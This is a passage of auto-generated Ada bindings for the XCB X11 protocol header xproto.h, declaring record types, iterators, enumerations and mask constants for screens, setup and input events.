C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:120 subtype xcb_fontable_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:126 --* -- * @brief xcb_fontable_iterator_t -- * type xcb_fontable_iterator_t is record data : access xcb_fontable_t; -- /usr/include/xcb/xproto.h:132 c_rem : aliased int; -- /usr/include/xcb/xproto.h:133 index : aliased int; -- /usr/include/xcb/xproto.h:134 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:131 subtype xcb_bool32_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:137 --* -- * @brief xcb_bool32_iterator_t -- * type xcb_bool32_iterator_t is record data : access xcb_bool32_t; -- /usr/include/xcb/xproto.h:143 c_rem : aliased int; -- /usr/include/xcb/xproto.h:144 index : aliased int; -- /usr/include/xcb/xproto.h:145 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:142 subtype xcb_visualid_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:148 --* -- * @brief xcb_visualid_iterator_t -- * type xcb_visualid_iterator_t is record data : access xcb_visualid_t; -- /usr/include/xcb/xproto.h:154 c_rem : aliased int; -- /usr/include/xcb/xproto.h:155 index : aliased int; -- /usr/include/xcb/xproto.h:156 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:153 subtype xcb_timestamp_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:159 --* -- * @brief xcb_timestamp_iterator_t -- * type xcb_timestamp_iterator_t is record data : access xcb_timestamp_t; -- /usr/include/xcb/xproto.h:165 c_rem : aliased int; -- /usr/include/xcb/xproto.h:166 index : aliased int; -- /usr/include/xcb/xproto.h:167 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:164 subtype xcb_keysym_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:170 --* -- * @brief xcb_keysym_iterator_t -- * type xcb_keysym_iterator_t is record data : access xcb_keysym_t; -- /usr/include/xcb/xproto.h:176 c_rem : aliased int; -- /usr/include/xcb/xproto.h:177 index : aliased int; -- /usr/include/xcb/xproto.h:178 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:175 subtype xcb_keycode_t is bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:181 --* -- * @brief xcb_keycode_iterator_t -- * type xcb_keycode_iterator_t is record data : access xcb_keycode_t; -- /usr/include/xcb/xproto.h:187 c_rem : aliased int; -- /usr/include/xcb/xproto.h:188 index : aliased int; -- /usr/include/xcb/xproto.h:189 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:186 subtype xcb_keycode32_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:192 --* -- * @brief xcb_keycode32_iterator_t -- * type xcb_keycode32_iterator_t is record data : access xcb_keycode32_t; -- /usr/include/xcb/xproto.h:198 c_rem : aliased int; -- /usr/include/xcb/xproto.h:199 index : aliased int; -- /usr/include/xcb/xproto.h:200 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:197 subtype xcb_button_t is bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:203 --* -- * @brief xcb_button_iterator_t -- * type xcb_button_iterator_t is record data : access xcb_button_t; -- /usr/include/xcb/xproto.h:209 c_rem : aliased int; -- /usr/include/xcb/xproto.h:210 index : aliased int; -- /usr/include/xcb/xproto.h:211 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:208 --* -- * @brief xcb_point_t -- * type xcb_point_t is record x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:218 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:219 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:217 --* -- * @brief xcb_point_iterator_t -- * type xcb_point_iterator_t is record data : access xcb_point_t; -- /usr/include/xcb/xproto.h:226 c_rem : aliased int; -- /usr/include/xcb/xproto.h:227 index : aliased int; -- /usr/include/xcb/xproto.h:228 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:225 --* -- * @brief xcb_rectangle_t -- * type xcb_rectangle_t is record x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:235 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:236 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:237 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:238 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:234 --* -- * @brief xcb_rectangle_iterator_t -- * type xcb_rectangle_iterator_t is record data : access xcb_rectangle_t; -- /usr/include/xcb/xproto.h:245 c_rem : aliased int; -- /usr/include/xcb/xproto.h:246 index : aliased int; -- /usr/include/xcb/xproto.h:247 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:244 --* -- * @brief xcb_arc_t -- * type xcb_arc_t is record x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:254 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:255 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:256 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:257 angle1 : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:258 angle2 : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:259 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:253 --* -- * @brief xcb_arc_iterator_t -- * type xcb_arc_iterator_t is record data : access xcb_arc_t; -- /usr/include/xcb/xproto.h:266 c_rem : aliased int; -- /usr/include/xcb/xproto.h:267 index : aliased int; -- /usr/include/xcb/xproto.h:268 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:265 --* -- * @brief xcb_format_t -- * type xcb_format_t_array1778 is array (0 .. 4) of aliased bits_stdint_uintn_h.uint8_t; type xcb_format_t is record depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:275 bits_per_pixel : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:276 scanline_pad : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:277 pad0 : aliased xcb_format_t_array1778; -- /usr/include/xcb/xproto.h:278 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:274 --* -- * @brief xcb_format_iterator_t -- * type xcb_format_iterator_t is record data : access xcb_format_t; -- /usr/include/xcb/xproto.h:285 c_rem : aliased int; -- /usr/include/xcb/xproto.h:286 index : aliased int; -- /usr/include/xcb/xproto.h:287 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:284 type xcb_visual_class_t is (XCB_VISUAL_CLASS_STATIC_GRAY, XCB_VISUAL_CLASS_GRAY_SCALE, XCB_VISUAL_CLASS_STATIC_COLOR, XCB_VISUAL_CLASS_PSEUDO_COLOR, XCB_VISUAL_CLASS_TRUE_COLOR, XCB_VISUAL_CLASS_DIRECT_COLOR) with Convention => C; -- /usr/include/xcb/xproto.h:290 --* -- * @brief xcb_visualtype_t -- * type xcb_visualtype_t_array1791 is array (0 .. 3) of aliased bits_stdint_uintn_h.uint8_t; type xcb_visualtype_t is record visual_id : aliased xcb_visualid_t; -- /usr/include/xcb/xproto.h:303 u_class : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:304 bits_per_rgb_value : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:305 colormap_entries : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:306 red_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:307 green_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:308 blue_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:309 pad0 : aliased xcb_visualtype_t_array1791; -- /usr/include/xcb/xproto.h:310 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:302 --* -- * @brief xcb_visualtype_iterator_t -- * type xcb_visualtype_iterator_t is record data : access xcb_visualtype_t; -- /usr/include/xcb/xproto.h:317 c_rem : aliased int; -- /usr/include/xcb/xproto.h:318 index : aliased int; -- /usr/include/xcb/xproto.h:319 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:316 --* -- * @brief xcb_depth_t -- * type xcb_depth_t_array1791 is array (0 .. 3) of aliased bits_stdint_uintn_h.uint8_t; type xcb_depth_t is record depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:326 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:327 visuals_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:328 pad1 : aliased xcb_depth_t_array1791; -- /usr/include/xcb/xproto.h:329 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:325 --* -- * @brief xcb_depth_iterator_t -- * type xcb_depth_iterator_t is record data : access xcb_depth_t; -- /usr/include/xcb/xproto.h:336 c_rem : aliased int; -- /usr/include/xcb/xproto.h:337 index : aliased int; -- /usr/include/xcb/xproto.h:338 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:335 subtype xcb_event_mask_t is unsigned; XCB_EVENT_MASK_NO_EVENT : constant unsigned := 0; XCB_EVENT_MASK_KEY_PRESS : constant unsigned := 1; XCB_EVENT_MASK_KEY_RELEASE : constant unsigned := 2; XCB_EVENT_MASK_BUTTON_PRESS : constant unsigned := 4; XCB_EVENT_MASK_BUTTON_RELEASE : constant unsigned := 8; XCB_EVENT_MASK_ENTER_WINDOW : constant unsigned := 16; XCB_EVENT_MASK_LEAVE_WINDOW : constant unsigned := 32; XCB_EVENT_MASK_POINTER_MOTION : constant unsigned := 64; XCB_EVENT_MASK_POINTER_MOTION_HINT : constant unsigned := 128; XCB_EVENT_MASK_BUTTON_1_MOTION : constant unsigned := 256; XCB_EVENT_MASK_BUTTON_2_MOTION : constant unsigned := 512; XCB_EVENT_MASK_BUTTON_3_MOTION : constant unsigned := 1024; XCB_EVENT_MASK_BUTTON_4_MOTION : constant unsigned := 2048; XCB_EVENT_MASK_BUTTON_5_MOTION : constant unsigned := 4096; XCB_EVENT_MASK_BUTTON_MOTION : constant unsigned := 8192; XCB_EVENT_MASK_KEYMAP_STATE : constant unsigned := 16384; XCB_EVENT_MASK_EXPOSURE : constant unsigned := 32768; XCB_EVENT_MASK_VISIBILITY_CHANGE : constant unsigned := 65536; XCB_EVENT_MASK_STRUCTURE_NOTIFY : constant unsigned := 131072; XCB_EVENT_MASK_RESIZE_REDIRECT : constant unsigned := 262144; XCB_EVENT_MASK_SUBSTRUCTURE_NOTIFY : constant unsigned := 524288; XCB_EVENT_MASK_SUBSTRUCTURE_REDIRECT : constant unsigned := 1048576; XCB_EVENT_MASK_FOCUS_CHANGE : constant unsigned := 2097152; XCB_EVENT_MASK_PROPERTY_CHANGE : constant unsigned := 4194304; XCB_EVENT_MASK_COLOR_MAP_CHANGE : constant unsigned := 8388608; XCB_EVENT_MASK_OWNER_GRAB_BUTTON : constant unsigned := 16777216; -- /usr/include/xcb/xproto.h:341 type xcb_backing_store_t is (XCB_BACKING_STORE_NOT_USEFUL, XCB_BACKING_STORE_WHEN_MAPPED, XCB_BACKING_STORE_ALWAYS) with Convention => C; -- /usr/include/xcb/xproto.h:370 --* -- * @brief xcb_screen_t -- * type xcb_screen_t is record root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:380 default_colormap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:381 white_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:382 black_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:383 current_input_masks : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:384 width_in_pixels : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:385 height_in_pixels : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:386 width_in_millimeters : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:387 height_in_millimeters : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:388 min_installed_maps : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:389 max_installed_maps : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:390 root_visual : aliased xcb_visualid_t; -- /usr/include/xcb/xproto.h:391 backing_stores : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:392 save_unders : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:393 root_depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:394 allowed_depths_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:395 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:379 --* -- * @brief xcb_screen_iterator_t -- * type xcb_screen_iterator_t is record data : access xcb_screen_t; -- /usr/include/xcb/xproto.h:402 c_rem : aliased int; -- /usr/include/xcb/xproto.h:403 index : aliased int; -- /usr/include/xcb/xproto.h:404 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:401 --* -- * @brief xcb_setup_request_t -- * type xcb_setup_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_setup_request_t is record byte_order : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:411 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:412 protocol_major_version : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:413 protocol_minor_version : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:414 authorization_protocol_name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:415 authorization_protocol_data_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:416 pad1 : aliased xcb_setup_request_t_array1823; -- /usr/include/xcb/xproto.h:417 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:410 --* -- * @brief xcb_setup_request_iterator_t -- * type xcb_setup_request_iterator_t is record data : access xcb_setup_request_t; -- /usr/include/xcb/xproto.h:424 c_rem : aliased int; -- /usr/include/xcb/xproto.h:425 index : aliased int; -- /usr/include/xcb/xproto.h:426 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:423 --* -- * @brief xcb_setup_failed_t -- * type xcb_setup_failed_t is record status : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:433 reason_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:434 protocol_major_version : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:435 protocol_minor_version : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:436 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:437 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:432 --* -- * @brief xcb_setup_failed_iterator_t -- * type xcb_setup_failed_iterator_t is record data : access xcb_setup_failed_t; -- /usr/include/xcb/xproto.h:444 c_rem : aliased int; -- /usr/include/xcb/xproto.h:445 index : aliased int; -- /usr/include/xcb/xproto.h:446 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:443 --* -- * @brief xcb_setup_authenticate_t -- * type xcb_setup_authenticate_t_array1778 is array (0 .. 4) of aliased bits_stdint_uintn_h.uint8_t; type xcb_setup_authenticate_t is record status : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:453 pad0 : aliased xcb_setup_authenticate_t_array1778; -- /usr/include/xcb/xproto.h:454 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:455 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:452 --* -- * @brief xcb_setup_authenticate_iterator_t -- * type xcb_setup_authenticate_iterator_t is record data : access xcb_setup_authenticate_t; -- /usr/include/xcb/xproto.h:462 c_rem : aliased int; -- /usr/include/xcb/xproto.h:463 index : aliased int; -- /usr/include/xcb/xproto.h:464 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:461 type xcb_image_order_t is (XCB_IMAGE_ORDER_LSB_FIRST, XCB_IMAGE_ORDER_MSB_FIRST) with Convention => C; -- /usr/include/xcb/xproto.h:467 --* -- * @brief xcb_setup_t -- * type xcb_setup_t_array1791 is array (0 .. 3) of aliased bits_stdint_uintn_h.uint8_t; type xcb_setup_t is record status : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:476 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:477 protocol_major_version : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:478 protocol_minor_version : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:479 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:480 release_number : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:481 resource_id_base : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:482 resource_id_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:483 motion_buffer_size : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:484 vendor_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:485 maximum_request_length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:486 roots_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:487 pixmap_formats_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:488 image_byte_order : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:489 bitmap_format_bit_order : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:490 bitmap_format_scanline_unit : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:491 bitmap_format_scanline_pad : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:492 min_keycode : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:493 max_keycode : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:494 pad1 : aliased xcb_setup_t_array1791; -- /usr/include/xcb/xproto.h:495 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:475 --* -- * @brief xcb_setup_iterator_t -- * type xcb_setup_iterator_t is record data : access xcb_setup_t; -- /usr/include/xcb/xproto.h:502 c_rem : aliased int; -- /usr/include/xcb/xproto.h:503 index : aliased int; -- /usr/include/xcb/xproto.h:504 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:501 subtype xcb_mod_mask_t is unsigned; XCB_MOD_MASK_SHIFT : constant unsigned := 1; XCB_MOD_MASK_LOCK : constant unsigned := 2; XCB_MOD_MASK_CONTROL : constant unsigned := 4; XCB_MOD_MASK_1 : constant unsigned := 8; XCB_MOD_MASK_2 : constant unsigned := 16; XCB_MOD_MASK_3 : constant unsigned := 32; XCB_MOD_MASK_4 : constant unsigned := 64; XCB_MOD_MASK_5 : constant unsigned := 128; XCB_MOD_MASK_ANY : constant unsigned := 32768; -- /usr/include/xcb/xproto.h:507 subtype xcb_key_but_mask_t is unsigned; XCB_KEY_BUT_MASK_SHIFT : constant unsigned := 1; XCB_KEY_BUT_MASK_LOCK : constant unsigned := 2; XCB_KEY_BUT_MASK_CONTROL : constant unsigned := 4; XCB_KEY_BUT_MASK_MOD_1 : constant unsigned := 8; XCB_KEY_BUT_MASK_MOD_2 : constant unsigned := 16; XCB_KEY_BUT_MASK_MOD_3 : constant unsigned := 32; XCB_KEY_BUT_MASK_MOD_4 : constant unsigned := 64; XCB_KEY_BUT_MASK_MOD_5 : constant unsigned := 128; XCB_KEY_BUT_MASK_BUTTON_1 : constant unsigned := 256; XCB_KEY_BUT_MASK_BUTTON_2 : constant unsigned := 512; XCB_KEY_BUT_MASK_BUTTON_3 : constant unsigned := 1024; XCB_KEY_BUT_MASK_BUTTON_4 : constant unsigned := 2048; XCB_KEY_BUT_MASK_BUTTON_5 : constant unsigned := 4096; -- /usr/include/xcb/xproto.h:519 type xcb_window_enum_t is (XCB_WINDOW_NONE) with Convention => C; -- /usr/include/xcb/xproto.h:535 --* Opcode for xcb_key_press. --* -- * @brief xcb_key_press_event_t -- * type xcb_key_press_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:546 detail : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:547 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:548 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:549 root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:550 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:551 child : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:552 root_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:553 root_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:554 event_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:555 event_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:556 state : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:557 same_screen : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:558 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:559 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:545 --* Opcode for xcb_key_release. subtype xcb_key_release_event_t is xcb_key_press_event_t; -- /usr/include/xcb/xproto.h:565 subtype xcb_button_mask_t is unsigned; XCB_BUTTON_MASK_1 : constant unsigned := 256; XCB_BUTTON_MASK_2 : constant unsigned := 512; XCB_BUTTON_MASK_3 : constant unsigned := 1024; XCB_BUTTON_MASK_4 : constant unsigned := 2048; XCB_BUTTON_MASK_5 : constant unsigned := 4096; XCB_BUTTON_MASK_ANY : constant unsigned := 32768; -- /usr/include/xcb/xproto.h:567 --* Opcode for xcb_button_press. --* -- * @brief xcb_button_press_event_t -- * type xcb_button_press_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:583 detail : aliased xcb_button_t; -- /usr/include/xcb/xproto.h:584 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:585 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:586 root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:587 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:588 child : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:589 root_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:590 root_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:591 event_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:592 event_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:593 state : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:594 same_screen : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:595 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:596 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:582 --* Opcode for xcb_button_release. subtype xcb_button_release_event_t is xcb_button_press_event_t; -- /usr/include/xcb/xproto.h:602 type xcb_motion_t is (XCB_MOTION_NORMAL, XCB_MOTION_HINT) with Convention => C; -- /usr/include/xcb/xproto.h:604 --* Opcode for xcb_motion_notify. --* -- * @brief xcb_motion_notify_event_t -- * type xcb_motion_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:616 detail : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:617 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:618 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:619 root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:620 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:621 child : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:622 root_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:623 root_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:624 event_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:625 event_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:626 state : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:627 same_screen : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:628 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:629 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:615 type xcb_notify_detail_t is (XCB_NOTIFY_DETAIL_ANCESTOR, XCB_NOTIFY_DETAIL_VIRTUAL, XCB_NOTIFY_DETAIL_INFERIOR, XCB_NOTIFY_DETAIL_NONLINEAR, XCB_NOTIFY_DETAIL_NONLINEAR_VIRTUAL, XCB_NOTIFY_DETAIL_POINTER, XCB_NOTIFY_DETAIL_POINTER_ROOT, XCB_NOTIFY_DETAIL_NONE) with Convention => C; -- /usr/include/xcb/xproto.h:632 type xcb_notify_mode_t is (XCB_NOTIFY_MODE_NORMAL, XCB_NOTIFY_MODE_GRAB, XCB_NOTIFY_MODE_UNGRAB, XCB_NOTIFY_MODE_WHILE_GRABBED) with Convention => C; -- /usr/include/xcb/xproto.h:643 --* Opcode for xcb_enter_notify. --* -- * @brief xcb_enter_notify_event_t -- * type xcb_enter_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:657 detail : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:658 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:659 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:660 root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:661 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:662 child : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:663 root_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:664 root_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:665 event_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:666 event_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:667 state : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:668 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:669 same_screen_focus : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:670 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:656 --* Opcode for xcb_leave_notify. subtype xcb_leave_notify_event_t is xcb_enter_notify_event_t; -- /usr/include/xcb/xproto.h:676 --* Opcode for xcb_focus_in. --* -- * @brief xcb_focus_in_event_t -- * type xcb_focus_in_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_focus_in_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:685 detail : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:686 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:687 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:688 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:689 pad0 : aliased xcb_focus_in_event_t_array1897; -- /usr/include/xcb/xproto.h:690 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:684 --* Opcode for xcb_focus_out. subtype xcb_focus_out_event_t is xcb_focus_in_event_t; -- /usr/include/xcb/xproto.h:696 --* Opcode for xcb_keymap_notify. --* -- * @brief xcb_keymap_notify_event_t -- * type xcb_keymap_notify_event_t_array1904 is array (0 .. 30) of aliased bits_stdint_uintn_h.uint8_t; type xcb_keymap_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:705 keys : aliased xcb_keymap_notify_event_t_array1904; -- /usr/include/xcb/xproto.h:706 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:704 --* Opcode for xcb_expose. --* -- * @brief xcb_expose_event_t -- * type xcb_expose_event_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_expose_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:716 pad0 : aliased 